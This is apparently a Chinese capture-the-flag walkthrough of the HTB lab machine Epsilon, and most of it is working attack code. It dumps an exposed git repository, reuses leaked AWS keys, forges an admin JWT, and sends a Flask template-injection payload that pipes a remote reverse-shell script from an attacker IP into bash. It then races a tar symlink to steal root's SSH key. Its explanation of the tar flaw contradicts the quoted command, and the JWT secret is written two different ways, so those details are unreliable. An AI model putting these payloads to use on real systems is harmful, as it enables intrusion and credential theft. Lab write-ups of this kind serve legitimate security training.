[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijack)权限提升

字数 923 2025-08-29 08:30:18

Epsilon 靶机渗透测试与权限提升完整指南

信息收集阶段

初始扫描

目标IP: 10.10.11.134

开放端口:

22/tcp - OpenSSH 8.2p1 Ubuntu
80/tcp - Apache httpd 2.4.41 (返回403)
5000/tcp - Werkzeug httpd 2.0.2 (Python 3.8.10)

主机发现与扫描

ip='10.10.11.134'; itf='tun0'
if nmap -Pn -sn "$ip" | grep -q "Host is up"; then
  echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
  ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
  if [ -n "$ports" ]; then
    echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
    nmap -Pn -sV -sC -p "$ports" "$ip"
  else
    echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
  fi
else
  echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
fi

Git信息泄露利用

发现和下载Git仓库

dirb http://10.10.11.134
git-dumper http://10.10.11.134/.git/ /tmp/res

关键文件分析

发现两个重要文件:

server.py - Flask应用程序
track_api_CR_148.py - 包含AWS凭证

AWS凭证泄露与利用

提取AWS凭证

从Git历史中获取:

git log -p --all

发现AWS凭证:

Access Key ID: AQLA5M37BDN6FJP76TDC
Secret Access Key: OsK0o/glWwcjk2U3vVEowkvq5t4EiIreB+WdFo1A

配置AWS CLI

aws configure

输入获取的凭证和区域us-east-1

列出Lambda函数

aws --endpoint-url=http://cloud.epsilon.htb lambda list-functions

获取特定函数信息

aws --endpoint-url=http://cloud.epsilon.htb lambda get-function --function-name=costume_shop_v1

从响应中获取JWT密钥: RrXCvmrNe!K!4+5wYq

JWT伪造与认证绕过

生成管理员JWT令牌

import jwt
print("Cookie: auth="+jwt.encode({"username": "admin", "password": "admin"}, "RrXCv`mrNe!K!4+5`wYq", algorithm="HS256"))

验证网站

whatweb http://epsilon.htb:5000/home --cookie='auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbiJ9.r6AIIBdhkEV-3LEXG1usQ40lEDpHywesJwRqFc-FgcA'

Flask SSTI漏洞利用

构造SSTI Payload

通过/order路由的costume参数注入:

costume={{request.application.__globals__.__builtins__.__import__('os').popen('curl+10.10.16.33/reverse.sh|bash').read()}}

完整HTTP请求

POST /order HTTP/1.1
Host: epsilon.htb:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: http://epsilon.htb:5000
Connection: close
Referer: http://epsilon.htb:5000/order
Cookie: auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbiJ9.r6AIIBdhkEV-3LEXG1usQ40lEDpHywesJwRqFc-FgcA
Upgrade-Insecure-Requests: 1

costume={{request.application.__globals__.__builtins__.__import__('os').popen('curl+10.10.16.33/reverse.sh|bash').read()}}&q=fff&addr=dddd

权限提升: tar符号链接劫持

分析备份脚本

发现备份脚本存在漏洞:

/usr/bin/tar -chvf "/var/backups/web_backups/${check_file}.tar" /opt/backups/checksum "/opt/backups/$file.tar"

缺少-h参数导致符号链接可以被劫持

利用步骤

监控/opt/backups/checksum文件创建
快速替换为指向root SSH私钥的符号链接
等待备份完成

ls -la /var/backups/web_backups/; 
while ! [ -e /opt/backups/checksum ]; do :; done; 
rm -rf /opt/backups/checksum && ln -sf /root/.ssh/id_rsa /opt/backups/checksum;
ls -la /var/backups/web_backups/

关键文件位置

用户flag: /home/user/user.txt (e1c8605ea5b043a7fc870cadea41d42a)
root flag: /root/root.txt

总结

本靶机涉及多个关键漏洞:

Git信息泄露导致AWS凭证暴露
JWT密钥硬编码导致认证绕过
Flask SSTI模板注入
tar备份脚本符号链接劫持漏洞

通过综合利用这些漏洞，可以从信息收集逐步提升到root权限。